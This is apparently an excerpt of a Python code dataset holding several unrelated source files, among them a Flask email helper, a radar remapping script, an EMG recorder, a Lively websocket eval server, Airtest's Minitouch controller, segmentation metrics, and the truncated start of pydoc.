source
stringlengths
3
86
python
stringlengths
75
1.04M
threading_queues.py
from threading import Thread from queue import Queue def producer(queue): for i in range(10): print(str(i)) # item = make_an_item_available(i) item = i queue.put(str(item)) def consumer(queue): while True: item = queue.get() print("Received item in queue fro thread" + item) queue.task_done() queue = Queue() t1 = Thread(target=producer, args=(queue, )) t2 = Thread(target=consumer, args=(queue, )) t1.start() t2.start()
email.py
from threading import Thread from flask import current_app, render_template from flask_mail import Message from . import mail def send_email(to, subject, template, **kwargs): # Get app object app = current_app._get_current_object() # Compose message msg = Message(subject=app.config['BOOKORGANIZER_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['BOOKORGANIZER_MAIL_SENDER'], recipients=[to]) msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) # Create & start thread thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr def send_async_email(app, msg): with app.app_context(): mail.send(msg)
run_radremap.py
""" This script runs the radar remapper (88d2arps) to map the polar radar data onto the ARPS grid. It takes one command-line argument, the (python) configuration file for that experiment, from which it imports the appropriate info """ import os import sys import glob import shutil import subprocess import threading from arpsenkftools.editNamelist import editNamelistFile from arpsenkftools.io_utils import import_all_from def run_remapper(command_arg_list): """Runs the radar remapper""" exe_path = command_arg_list[0] input_file_path = command_arg_list[1] output_file_path = command_arg_list[2] input_file = open(input_file_path, 'r') output_file = open(output_file_path, 'w') p = subprocess.Popen([exe_path], stdin=input_file, stdout=output_file) p.wait() print("Job {} for {} completed, return code: {}".format(exe_path, input_file_path, str(p.returncode))) input_file.close() output_file.close() # TODO: comment out this line when actually running the script. This is just to let the python # linter know about the various parameters in the config file # from arpsenkftools import master_config_default as config # import the experiment configuration file given by the first command-line argument if len(sys.argv) > 1: # Try to import user-defined config file config_file = sys.argv[1] print("Config file is " + config_file) try: config = import_all_from(config_file) print("Successfully imported experiment configuration.") except Exception: print("Unable to import experiment configuration. Exiting!") else: print("Please provide an experiment configuration file on the command line! Exiting!") # Set the path to the radremap_88D.input namelist template file radremap_input_template_path = os.path.join(config.template_exp_dir, 'radremap_88D.input') # Create the radremap work directory in icbc scratch directory if it doesn't already exist. radremap_work_dir = os.path.join(config.prep_work_dir, 'radremap_work') if not os.path.exists(radremap_work_dir): os.makedirs(radremap_work_dir) radar_list = config.radremap_param.pop('radar_list') # Loop through radars for radname in radar_list: # Get the list of level-2 radar data files level2_paths = glob.glob(config.radar_obs_dir + '/{}*'.format(radname)) level2_file_names = [os.path.basename(level2_path) for level2_path in level2_paths] level2_file_times = [] # Create working subdirectory for the current radar radar_work_dir = os.path.join(radremap_work_dir, radname) if not os.path.exists(radar_work_dir): os.makedirs(radar_work_dir) # Link the radarinfo.dat file if not os.path.lexists(os.path.join(radar_work_dir, 'radarinfo.dat')): os.symlink(config.template_base_dir + '/radarinfo.dat', radar_work_dir + '/radarinfo.dat') # create the list of radremap input and output file names radremap_input_file_paths = ["{}/{}.radremap_88D.input".format(radar_work_dir, level2_file_name) for level2_file_name in level2_file_names] radremap_output_file_paths = ["{}/{}.radremap_88D.output".format(radar_work_dir, level2_file_name) for level2_file_name in level2_file_names] # Create output directory for remapped radar files if it doesn't already exist if not os.path.exists(config.remapped_radar_dir): os.makedirs(config.remapped_radar_dir) # Link the radarinfo.dat file into the remapped radar directory radarinfo_link = os.path.join(config.remapped_radar_dir, config.radarinfo_file) if not os.path.exists(radarinfo_link): os.symlink(config.radarinfo_path, radarinfo_link) # Change directories to the output directory os.chdir(config.remapped_radar_dir) # Create the namelist files initime_stamp = config.initial_datetime.strftime('%Y-%m-%d.%H:%M:00') for level2_file_name, level2_path, radremap_input_file_path, radremap_output_file_path in \ zip(level2_file_names, level2_paths, radremap_input_file_paths, radremap_output_file_paths): editNamelistFile(radremap_input_template_path, radremap_input_file_path, **config.grid_param, initime=initime_stamp, inifile=config.external_inifile_path, inigbf=config.external_inigbf_path, radname=radname, radfname=level2_path, dirname=config.remapped_radar_dir + '/') # Run the radar remapper for each file count = 0 commands = [] nthreads = config.radremap_param.get('nthreads', 1) nfiles = len(level2_file_names) for i, level2_file_name, level2_path, radremap_input_file_path, radremap_output_file_path in \ zip(range(nfiles), level2_file_names, level2_paths, radremap_input_file_paths, radremap_output_file_paths): radar_time = level2_file_name[4:19] radar_time_subdir = os.path.join(config.remapped_radar_dir, radar_time) if not os.path.exists(radar_time_subdir): os.makedirs(radar_time_subdir) if count < nthreads: commands.append([config.radremap_exe_path, radremap_input_file_path, radremap_output_file_path]) count += 1 if count == nthreads or i == nfiles - 1: proc = [threading.Thread(target=run_remapper, kwargs={'command_arg_list': cmd}) for cmd in commands] [p.start() for p in proc] [p.join() for p in proc] print("Done with batch!") count = 0 commands = [] # with open(radremap_input_file_path, 'r') as input_file, \ # open(radremap_output_file_path, 'w') as output_file: # print("Running {} for {}".format(config.radremap_exe_path, radremap_input_file_path)) # subprocess.call(config.radremap_exe_path, stdin=input_file, stdout=output_file, # shell=True) # Check for auxilliary files and move them into an appropriate subdirectory refl_files = glob.glob(config.remapped_radar_dir + '/*refl*') if refl_files: for refl_file in refl_files: shutil.move(refl_file, radar_time_subdir) tilt_files = glob.glob(config.remapped_radar_dir + '/*tilts*') if tilt_files: for tilt_files in tilt_files: shutil.move(tilt_files, radar_time_subdir)
recorder.py
import numpy as np import threading import queue import time from common import gtec import matplotlib.pyplot as plt from common.config import * class Recorder: def __init__( self, sample_duration=SAMPLE_DURATION, num_channels=2, channel_offset=0, signal_type="emg", ): """ Create a Recorder for EOG/EMG signals :param sample_duration: duration of sampling windows [s] :param num_channels: number of channels to record :param channel_offset: number of channels to skip :param signal_type: emg/eog """ self._stop = False self._sample_duration = sample_duration self._num_channels = num_channels self._channel_offset = channel_offset self._labels = queue.Queue() self._signal_type = signal_type self._amp = gtec.GUSBamp() self._amp.set_sampling_frequency( FS, [True for i in range(16)], None, (48, 52, FS, 4) ) self._amp.start() def start_offline_recording(self, live=True): """ Start a thread for recording. """ threading.Thread(target=self._record).start() def stop_offline_recording(self): """ Terminate the recording thread. """ self._stop = True def get_data(self): """ Get data for the duratoin of the previously defined sample_duration. """ signals, _ = self._amp.get_data() return signals def read_sample_win(self, duration=None): """ Read in a sample window. :param duration: duration to sample [s], if left out, the duration passed to the constructor will be used :return: sampled signals """ if duration is None: num_samples = int(self._sample_duration * FS) else: num_samples = int(duration * FS) sample_win = np.zeros((num_samples, self._num_channels)) # start sampling num_collected_samples = 0 sampling = True while sampling: signals, _ = self._amp.get_data() for i_sample in range(signals.shape[0]): for channel in range(self._num_channels): sample_win[num_collected_samples, channel] = signals[ i_sample, channel + self._channel_offset ] num_collected_samples += 1 if num_collected_samples == num_samples: sampling = False return sample_win def record_label(self, label): """ Queue a label to be recorded :param label: """ self._labels.put(label) def _record(self): while not self._stop: label = self._labels.get() signals = self.read_sample_win() np.savez( "training_data/{}/{}.npz".format(self._signal_type, time.time()), signals=signals, label=label.value, ) def main(): recorder = Recorder(sample_duration=6) raw_data = recorder.read_sample_win() fig = plt.figure(figsize=(12, 10)) ax2 = fig.add_subplot(2, 1, 1) ax2.set_title("Signal channel 2 - channel 1") ax2.set_xlabel("samples") ax2.set_ylabel("voltage") ax2.plot(raw_data[2 * 1200 :, 1] - raw_data[2 * 1200 :, 0]) ax2 = fig.add_subplot(2, 1, 2) ax2.set_title("Signal channel 4 - channel 3") ax2.set_xlabel("samples") ax2.set_ylabel("voltage") ax2.plot(raw_data[2 * 1200 :, 3] - raw_data[2 * 1200 :, 2]) plt.tight_layout() plt.show() if __name__ == "__main__": main()
ws_server.py
import asyncio from multiprocessing import Process import json import traceback import websockets from lively.eval import run_eval from lively.completions import get_completions from lively.code_formatting import code_format def test(): loop = asyncio.get_event_loop() start("0.0.0.0", 9942, loop) debug = True async def handle_eval(data, websocket): source = data.get("source") module_name = data.get("moduleName") if not source: await websocket.send(json.dumps({"error": "needs source"})) return if debug: print("evaluating {}".format( (source[:30] + "..." if len(source) > 30 else source).replace("\n", ""))) result = await run_eval(source, module_name, websocket) # if debug: print("eval done", result, result.json_stringify()) await websocket.send(result.json_stringify()) async def handle_completion(data, websocket): if "source" not in data: return await websocket.send(json.dumps({"error": "needs source"})) if "row" not in data: return await websocket.send(json.dumps({"error": "needs row"})) if "column" not in data: return await websocket.send(json.dumps({"error": "needs column"})) completions = await get_completions( data.get("source"), data.get("row"), data.get("column"), data.get("file") or "__workspace__.py") if debug: print("completions: {}".format(len(completions))) await websocket.send(json.dumps(completions)) async def handle_code_format(data, websocket): if "source" not in data: return await websocket.send(json.dumps({"error": "needs source"})) try: formatted_code = code_format( data.get("source"), data.get("lines"), data.get("file") or "<unknown>", data.get("style")) if debug: print("code_format done") answer = formatted_code except Exception as err: answer = json.dumps({'error': str(err)}) print(data.get("lines")) await websocket.send(json.dumps(answer)) async def handle_message(message, websocket, path): """{action, data, target}""" action = message.get("action") data = message.get("data") if not action: await websocket.send(json.dumps({"error": "message needs action"})) return if action == "eval": return await handle_eval(data, websocket) if action == "completion": return await handle_completion(data, websocket) if action == "code_format": return await handle_code_format(data, websocket) await websocket.send(json.dumps({"error": "message not understood {}".format(action)})) connections = set() async def handler(websocket, path): if debug: print("got connection") connections.add(websocket) # allow client to send itself extra data websocket.send_raw_data = lambda data: websocket.send(data) while True: try: message = await websocket.recv() except websockets.exceptions.ConnectionClosed: if debug: print("connection closed") connections.remove(websocket) break # if debug: print("got " + message) try: parsed = json.loads(message) await handle_message(parsed, websocket, path) except Exception as err: # err_str = json.dumps({"error": str(err)}) # err_str = json.dumps({"error": "\n".join(traceback.format_tb(err.__traceback__))}) err_str = json.dumps({"error": traceback.format_exc()}) print("error in handle_message: " + err_str) await websocket.send(err_str) continue # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # server start default_port = 9942 default_host = "127.0.0.1" def fix_pager(): __import__("os").environ['PAGER'] = 'cat' def start(hostname=default_host, port=default_port, loop=asyncio.get_event_loop()): fix_pager() serve = websockets.serve(handler, hostname, port) loop.run_until_complete(serve) print("server listening on {}:{}".format(hostname, port)) return serve def start_in_subprocess(**opts): def spawn(): loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) start(**{**opts, "loop": loop}) loop.run_forever() process = Process(target=spawn, kwargs=opts) process.start() return process if __name__ == '__main__': loop = asyncio.get_event_loop() start(loop=loop) loop.run_forever()
minitouch.py
# -*- coding: utf-8 -*- import os import re import socket import sys import threading import time import warnings import six from six.moves import queue from airtest.core.android.constant import STFLIB from airtest.utils.logger import get_logger from airtest.utils.nbsp import NonBlockingStreamReader from airtest.utils.safesocket import SafeSocket from airtest.utils.snippet import (get_std_encoding, on_method_ready, ready_method, reg_cleanup) LOGGING = get_logger(__name__) class Minitouch(object): """ Super fast operation from minitouch References: https://github.com/openstf/minitouch """ def __init__(self, adb, backend=False, ori_function=None): self.adb = adb self.backend = backend self.server_proc = None self.client = None self.size_info = None self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo self.max_x, self.max_y = None, None reg_cleanup(self.teardown) @ready_method def install_and_setup(self): """ Install and setup minitouch Returns: None """ self.install() self.size_info = self.ori_function() self.setup_server() if self.backend: self.setup_client_backend() else: self.setup_client() def uninstall(self): """ Uninstall minitouch Returns: None """ self.adb.raw_shell("rm /data/local/tmp/minitouch*") def install(self): """ Install minitouch Returns: None """ abi = self.adb.getprop("ro.product.cpu.abi") sdk = int(self.adb.getprop("ro.build.version.sdk")) if sdk >= 16: binfile = "minitouch" else: binfile = "minitouch-nopie" device_dir = "/data/local/tmp" path = os.path.join(STFLIB, abi, binfile).replace("\\", r"\\") if self.adb.exists_file('/data/local/tmp/minitouch'): local_minitouch_size = int(os.path.getsize(path)) try: file_size = self.adb.file_size('/data/local/tmp/minitouch') except Exception: self.uninstall() else: if local_minitouch_size == file_size: LOGGING.debug("install_minitouch skipped") return self.uninstall() self.adb.push(path, "%s/minitouch" % device_dir) self.adb.shell("chmod 755 %s/minitouch" % (device_dir)) LOGGING.info("install_minitouch finished") def __transform_xy(self, x, y): """ Transform coordinates (x, y) according to the device display Args: x: coordinate x y: coordinate y Returns: transformed coordinates (x, y) """ width, height = self.size_info['width'], self.size_info['height'] nx = x * self.max_x / width ny = y * self.max_y / height # print(nx, ny, self.max_x, self.max_y, width, height) return nx, ny def setup_server(self): """ Setip minitouch server and adb forward Returns: server process """ if self.server_proc: self.server_proc.kill() self.server_proc = None self.localport, deviceport = self.adb.setup_forward("localabstract:minitouch_{}".format) deviceport = deviceport[len("localabstract:"):] p = self.adb.start_shell("/data/local/tmp/minitouch -n '%s' 2>&1" % deviceport) nbsp = NonBlockingStreamReader(p.stdout, name="minitouch_server") while True: line = nbsp.readline(timeout=5.0) if line is None: raise RuntimeError("minitouch setup timeout") line = line.decode(get_std_encoding(sys.stdout)) # 识别出setup成功的log,并匹配出max_x, max_y m = re.match("Type \w touch device .+ \((\d+)x(\d+) with \d+ contacts\) detected on .+ \(.+\)", line) if m: self.max_x, self.max_y = int(m.group(1)), int(m.group(2)) break else: self.max_x = 32768 self.max_y = 32768 # nbsp.kill() # 保留,不杀了,后面还会继续读取并pirnt if p.poll() is not None: # server setup error, may be already setup by others # subprocess exit immediately raise RuntimeError("minitouch server quit immediately") self.server_proc = p # reg_cleanup(self.server_proc.kill) return p @on_method_ready('install_and_setup') def touch(self, tuple_xy, duration=0.01): """ Perform touch event minitouch protocol example:: d 0 10 10 50 c <wait in your own code> u 0 c Args: tuple_xy: coordinates (x, y) duration: time interval for touch event, default is 0.01 Returns: None """ x, y = tuple_xy x, y = self.__transform_xy(x, y) self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(x, y)) time.sleep(duration) self.handle("u 0\nc\n") def __swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform swipe event (without up action). minitouch protocol example:: d 0 0 0 50 c m 0 20 0 50 c m 0 40 0 50 c m 0 60 0 50 c m 0 80 0 50 c m 0 100 0 50 c u 0 c Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy to_x, to_y = tuple_to_xy from_x, from_y = self.__transform_xy(from_x, from_y) to_x, to_y = self.__transform_xy(to_x, to_y) interval = float(duration) / (steps + 1) time.sleep(interval) for i in range(1, steps): self.handle("m 0 {:.0f} {:.0f} 50\nc\n".format( from_x + (to_x - from_x) * i / steps, from_y + (to_y - from_y) * i / steps, )) time.sleep(interval) for i in range(10): self.handle("m 0 {:.0f} {:.0f} 50\nc\n".format(to_x, to_y)) time.sleep(interval) @on_method_ready('install_and_setup') def swipe_along(self, coordinates_list): """ Perform swipe event across multiple points in sequence. Args: coordinates_list: list of coordinates. Returns: None """ from_x, from_y = coordinates_list[0] self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y)) for pos,tuple_from_xy in enumerate(coordinates_list): try: tuple_to_xy = coordinates_list[pos+1] except IndexError: break self.__swipe(tuple_from_xy, tuple_to_xy) self.handle("u 0\nc\n") @on_method_ready('install_and_setup') def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform swipe event. Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy self.handle("d 0 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y)) self.__swipe(tuple_from_xy, tuple_to_xy) self.handle("u 0\nc\n") @on_method_ready('install_and_setup') def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5): """ Perform two finger swipe action minitouch protocol example:: d 0 0 0 50 d 1 1 0 50 c m 0 20 0 50 m 1 21 0 50 c m 0 40 0 50 m 1 41 0 50 c m 0 60 0 50 m 1 61 0 50 c m 0 80 0 50 m 1 81 0 50 c m 0 100 0 50 m 1 101 0 50 c u 0 u 1 c Args: tuple_from_xy: start point tuple_to_xy: end point duration: time interval for swipe duration, default is 0.8 steps: size of swipe step, default is 5 Returns: None """ from_x, from_y = tuple_from_xy to_x, to_y = tuple_to_xy from_x, from_y = self.__transform_xy(from_x, from_y) to_x, to_y = self.__transform_xy(to_x, to_y) w = self.size_info['width'] shift_x = 1 if from_x + 1 >= w else -1 interval = float(duration) / (steps + 1) self.handle("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(from_x, from_y, from_x + shift_x, from_y)) time.sleep(interval) for i in range(1, steps): self.handle("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( from_x + (to_x - from_x) * i / steps, from_y + (to_y - from_y) * i / steps, from_x + (to_x - from_x) * i / steps + shift_x, from_y + (to_y - from_y) * i / steps, )) time.sleep(interval) for i in range(10): self.handle("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(to_x, to_y, to_x + shift_x, to_y)) time.sleep(interval) self.handle("u 0\nu 1\nc\n") @on_method_ready('install_and_setup') def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'): """ Perform pinch action minitouch protocol example:: d 0 0 100 50 d 1 100 0 50 c m 0 10 90 50 m 1 90 10 50 c m 0 20 80 50 m 1 80 20 50 c m 0 20 80 50 m 1 80 20 50 c m 0 30 70 50 m 1 70 30 50 c m 0 40 60 50 m 1 60 40 50 c m 0 50 50 50 m 1 50 50 50 c u 0 u 1 c """ w, h = self.size_info['width'], self.size_info['height'] if isinstance(center, (list, tuple)): x0, y0 = center elif center is None: x0, y0 = w / 2, h / 2 else: raise RuntimeError("center should be None or list/tuple, not %s" % repr(center)) x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2 x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2 cmds = [] if in_or_out == 'in': cmds.append("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(x1, y1, x2, y2)) for i in range(1, steps): cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( x1+(x0-x1)*i/steps, y1+(y0-y1)*i/steps, x2+(x0-x2)*i/steps, y2+(y0-y2)*i/steps )) cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(x0, y0, x0, y0)) cmds.append("u 0\nu 1\nc\n") elif in_or_out == 'out': cmds.append("d 0 {:.0f} {:.0f} 50\nd 1 {:.0f} {:.0f} 50\nc\n".format(x0, y0, x0, y0)) for i in range(1, steps): cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format( x0+(x1-x0)*i/steps, y0+(y1-y0)*i/steps, x0+(x2-x0)*i/steps, y0+(y2-y0)*i/steps )) cmds.append("m 0 {:.0f} {:.0f} 50\nm 1 {:.0f} {:.0f} 50\nc\n".format(x1, y1, x2, y2)) cmds.append("u 0\nu 1\nc\n") else: raise RuntimeError("center should be 'in' or 'out', not {}".format(repr(in_or_out))) interval = float(duration) / (steps + 1) for i, c in enumerate(cmds): self.handle(c) time.sleep(interval) @on_method_ready('install_and_setup') def operate(self, args): """ Perform down, up and move actions Args: args: action arguments, dictionary containing type and x, y coordinates, e.g.:: { "type" : "down", "x" : 10, "y" : 10 } Raises: RuntimeError: is invalid arguments are provided Returns: None """ if args["type"] == "down": x, y = self.__transform_xy(args["x"], args["y"]) # support py 3 cmd = "d 0 {:.0f} {:.0f} 50\nc\n".format(x, y) elif args["type"] == "move": x, y = self.__transform_xy(args["x"], args["y"]) # support py 3 cmd = "m 0 {:.0f} {:.0f} 50\nc\n".format(x, y) elif args["type"] == "up": # support py 3 cmd = "u 0\nc\n" else: raise RuntimeError("invalid operate args: {}".format(args)) self.handle(cmd) @on_method_ready('install_and_setup') def perform(self, motion_events, interval=0.01): """ Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent :param motion_events: a list of MotionEvent instances :param interval: minimum interval between events :return: None """ for event in motion_events: if isinstance(event, SleepEvent): time.sleep(event.seconds) else: cmd = event.getcmd(transform=self.__transform_xy) self.handle(cmd) time.sleep(interval) def safe_send(self, data): """ Send data to client Args: data: data to send Raises: Exception: when data cannot be sent Returns: None """ if isinstance(data, six.text_type): data = data.encode('utf-8') try: self.client.send(data) except Exception as err: # raise MinitouchError(err) raise err def _backend_worker(self): """ Backend worker queue thread Returns: None """ while not self.backend_stop_event.isSet(): cmd = self.backend_queue.get() if cmd is None: break self.safe_send(cmd) def setup_client_backend(self): """ Setup backend client thread as daemon Returns: None """ self.backend_queue = queue.Queue() self.backend_stop_event = threading.Event() self.setup_client() t = threading.Thread(target=self._backend_worker, name="minitouch") # t.daemon = True t.start() self.backend_thread = t self.handle = self.backend_queue.put def setup_client(self): """ Setup client in following steps:: 1. connect to server 2. receive the header v <version> ^ <max-contacts> <max-x> <max-y> <max-pressure> $ <pid> 3. prepare to send Returns: None """ s = SafeSocket() s.connect((self.adb.host, self.localport)) s.sock.settimeout(2) header = b"" while True: try: header += s.sock.recv(4096) # size is not strict, so use raw socket.recv except socket.timeout: # raise RuntimeError("minitouch setup client error") warnings.warn("minitouch header not recved") break if header.count(b'\n') >= 3: break LOGGING.debug("minitouch header:%s", repr(header)) self.client = s self.handle = self.safe_send def teardown(self): """ Stop the server and client Returns: None """ if hasattr(self, "backend_stop_event"): self.backend_stop_event.set() self.backend_queue.put(None) if self.client: self.client.close() if self.server_proc: self.server_proc.kill() class MotionEvent(object): """ Motion Event to be performed by Minitouch """ def getcmd(self, transform=None): raise NotImplementedError class DownEvent(MotionEvent): def __init__(self, coordinates, contact=0, pressure=50): """ Finger Down Event :param coordinates: finger down coordinates in (x, y) :param contact: multi-touch action, starts from 0 :param pressure: touch pressure """ super(DownEvent, self).__init__() self.coordinates = coordinates self.contact = contact self.pressure = pressure def getcmd(self, transform=None): if transform: x, y = transform(*self.coordinates) else: x, y = self.coordinates cmd = "d {:.0f} {:.0f} {:.0f} {:.0f}\nc\n".format(self.contact, x, y, self.pressure) return cmd class UpEvent(MotionEvent): def __init__(self, contact=0): """ Finger Up Event :param contact: multi-touch action, starts from 0 """ super(UpEvent, self).__init__() self.contact = contact def getcmd(self, transform=None): cmd = "u {:.0f}\nc\n".format(self.contact) return cmd class MoveEvent(MotionEvent): def __init__(self, coordinates, contact=0, pressure=50): """ Finger Move Event :param coordinates: finger move to coordinates in (x, y) :param contact: multi-touch action, starts from 0 :param pressure: touch pressure """ super(MoveEvent, self).__init__() self.coordinates = coordinates self.contact = contact self.pressure = pressure def getcmd(self, transform=None): if transform: x, y = transform(*self.coordinates) else: x, y = self.coordinates cmd = "m {:.0f} {:.0f} {:.0f} {:.0f}\nc\n".format(self.contact, x, y, self.pressure) return cmd class SleepEvent(MotionEvent): def __init__(self, seconds): self.seconds = seconds def getcmd(self, transform=None): return None
metrics.py
import numpy as np from skimage.metrics import contingency_table from skimage.metrics import variation_of_information, adapted_rand_error import threading def precision(tp, fp, fn): return tp / (tp + fp) if tp > 0 else 0 def recall(tp, fp, fn): return tp / (tp + fn) if tp > 0 else 0 def accuracy(tp, fp, fn): return tp / (tp + fp + fn) if tp > 0 else 0 def f1(tp, fp, fn): return (2 * tp) / (2 * tp + fp + fn) if tp > 0 else 0 def _relabel(input): _, unique_labels = np.unique(input, return_inverse=True) return unique_labels.reshape(input.shape) def _iou_matrix(gt, seg): # relabel gt and seg for smaller memory footprint of contingency table gt = _relabel(gt) seg = _relabel(seg) # get number of overlapping pixels between GT and SEG n_inter = contingency_table(gt, seg).A # number of pixels for GT instances n_gt = n_inter.sum(axis=1, keepdims=True) # number of pixels for SEG instances n_seg = n_inter.sum(axis=0, keepdims=True) # number of pixels in the union between GT and SEG instances n_union = n_gt + n_seg - n_inter iou_matrix = n_inter / n_union # make sure that the values are within [0,1] range assert 0 <= np.min(iou_matrix) <= np.max(iou_matrix) <= 1 return iou_matrix class SegmentationMetrics: """ Computes precision, recall, accuracy, f1 score for a given ground truth and predicted segmentation. Contingency table for a given ground truth and predicted segmentation is computed eagerly upon construction of the instance of `SegmentationMetrics`. Args: gt (ndarray): ground truth segmentation seg (ndarray): predicted segmentation """ def __init__(self, gt, seg): self.iou_matrix = _iou_matrix(gt, seg) def metrics(self, iou_threshold): """ Computes precision, recall, accuracy, f1 score at a given IoU threshold """ # ignore background iou_matrix = self.iou_matrix[1:, 1:] detection_matrix = (iou_matrix > iou_threshold).astype(np.uint8) n_gt, n_seg = detection_matrix.shape # if the iou_matrix is empty or all values are 0 trivial = min(n_gt, n_seg) == 0 or np.all(detection_matrix == 0) if trivial: tp = fp = fn = 0 else: # count non-zero rows to get the number of TP tp = np.count_nonzero(detection_matrix.sum(axis=1)) # count zero rows to get the number of FN fn = n_gt - tp # count zero columns to get the number of FP fp = n_seg - np.count_nonzero(detection_matrix.sum(axis=0)) return { 'precision': precision(tp, fp, fn), 'recall': recall(tp, fp, fn), 'accuracy': accuracy(tp, fp, fn), 'f1': f1(tp, fp, fn) } class AveragePrecision: """ Average precision taken for the IoU range (0.5, 0.95) with a step of 0.05 as defined in: https://www.kaggle.com/stkbailey/step-by-step-explanation-of-scoring-metric """ def __init__(self, iou=None): if iou is not None: self.iou_range = [iou] else: self.iou_range = np.linspace(0.50, 0.95, 10) def __call__(self, input_seg, gt_seg): if len(np.unique(gt_seg)) == 1: return 1. # compute contingency_table sm = SegmentationMetrics(gt_seg, input_seg) # compute accuracy for each threshold acc = [sm.metrics(iou)['accuracy'] for iou in self.iou_range] # return the average return np.mean(acc) class ClusterMetrics: def __init__(self): self.splits_scores = [] self.merges_scores = [] self.are_score = [] self.arp_score = [] self.arr_score = [] def reset(self): self.splits_scores = [] self.merges_scores = [] self.are_score = [] self.arp_score = [] self.arr_score = [] def __call__(self, input_seg, gt_seg): splits, merges = variation_of_information(gt_seg, input_seg) self.splits_scores.append(splits) self.merges_scores.append(merges) are, arp, arr = adapted_rand_error(gt_seg, input_seg) self.are_score.append(are) self.arp_score.append(arp) self.arr_score.append(arr) def dump(self): return np.mean(self.splits_scores), np.mean(self.merges_scores), \ np.mean(self.are_score), np.mean(self.arp_score), \ np.mean(self.arr_score) def dump_std(self): return np.std(self.splits_scores), np.std(self.merges_scores), \ np.std(self.are_score), np.std(self.arp_score), \ np.std(self.arr_score) import numpy as np def dic(gt, seg): n_gt = len(np.setdiff1d(np.unique(gt), [0])) n_seg = len(np.setdiff1d(np.unique(seg), [0])) return np.abs(n_gt - n_seg) def dice_score(gt, seg, smooth = 1.): gt = gt > 0 seg = seg > 0 nom = 2 * np.sum(gt * seg) denom = np.sum(gt) + np.sum(seg) dice = float(nom + smooth) / float(denom + smooth) return dice class DiceScore: def __call__(self, gt, seg, smooth = 1.): return dice_score(gt, seg) def best_dice(gt, seg): gt_lables = np.setdiff1d(np.unique(gt), [0]) seg_labels = np.setdiff1d(np.unique(seg), [0]) best_dices = [] def dice(gt_idx): _gt_seg = (gt == gt_idx).astype('uint8') dices = [] for pred_idx in seg_labels: _pred_seg = (seg == pred_idx).astype('uint8') dice = dice_score(_gt_seg, _pred_seg) dices.append(dice) best_dice = np.max(dices) best_dices.append(best_dice) workers = [] for gt_idx in gt_lables: worker = threading.Thread(target=dice, args=(gt_idx,)) worker.start() workers.append(worker) for worker in workers: worker.join() return np.mean(best_dices) def symmetric_best_dice(gt, seg): bd1 = best_dice(gt, seg) bd2 = best_dice(seg, gt) return min(bd1, bd2) class SBD: def __call__(self, gt, seg): return symmetric_best_dice(gt, seg) class DiC: def __call__(self, gt, seg): return dic(gt, seg) if __name__ == "__main__": metric = AveragePrecision() cluster_metrics = ClusterMetrics() y_true = np.zeros((100,100), np.uint16) y_true[10:20,10:20] = 1 y_pred = np.roll(y_true, 10, axis = 0) * 2 score = metric(y_pred, y_true) cluster_metrics(y_pred, y_true) cl_scores = cluster_metrics.dump() print(score) print(*cl_scores)
pydoc.py
#!/usr/bin/env python # -*- coding: latin-1 -*- """Generate Python documentation in HTML or text for interactive use. In the Python interpreter, do "from pydoc import help" to provide online help. Calling help(thing) on a Python object documents the object. Or, at the shell command line outside of Python: Run "pydoc <name>" to show documentation on something. <name> may be the name of a function, module, package, or a dotted reference to a class or function within a module or module in a package. If the argument contains a path segment delimiter (e.g. slash on Unix, backslash on Windows) it is treated as the path to a Python source file. Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines of all available modules. Run "pydoc -p <port>" to start an HTTP server on a given port on the local machine to generate documentation web pages. For platforms without a command line, "pydoc -g" starts the HTTP server and also pops up a little window for controlling it. Run "pydoc -w <name>" to write out the HTML documentation for a module to a file named "<name>.html". Module docs for core modules are assumed to be in http://docs.python.org/library/ This can be overridden by setting the PYTHONDOCS environment variable to a different URL or to a local directory containing the Library Reference Manual pages. """ __author__ = "Ka-Ping Yee <ping@lfw.org>" __date__ = "26 February 2001" __version__ = "$Revision: 88564 $" __credits__ = """Guido van Rossum, for an excellent programming language. Tommy Burnette, the original creator of manpy. Paul Prescod, for all his work on onlinehelp. Richard Chamberlain, for the first implementation of textdoc. """ # Known bugs that can't be fixed here: # - imp.load_module() cannot be prevented from clobbering existing # loaded modules, so calling synopsis() on a binary module file # changes the contents of any existing module with the same name. # - If the __file__ attribute on a module is a relative path and # the current directory is changed with os.chdir(), an incorrect # path will be displayed. import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings from repr import Repr from string import expandtabs, find, join, lower, split, strip, rfind, rstrip from traceback import extract_tb try: from collections import deque except ImportError: # Python 2.3 compatibility class deque(list): def popleft(self): return self.pop(0) # --------------------------------------------------------- common routines def pathdirs(): """Convert sys.path into a list of absolute, existing, unique paths.""" dirs = [] normdirs = [] for dir in sys.path: 